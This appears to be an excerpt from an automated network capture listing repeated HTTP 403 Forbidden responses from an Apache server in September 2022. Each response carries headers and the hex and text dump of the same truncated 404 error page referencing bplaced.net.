                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:49.135158062 CEST14526INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:49 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=117
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:50.104963064 CEST14534INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:50 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=67
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20 68
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon" h
                                                                                                                                                Sep 29, 2022 14:50:51.140835047 CEST14542INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:51 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=108
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:52.183609009 CEST14549INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:52 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=92
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20 68
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon" h
                                                                                                                                                Sep 29, 2022 14:50:53.189707041 CEST14557INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:53 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=118
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
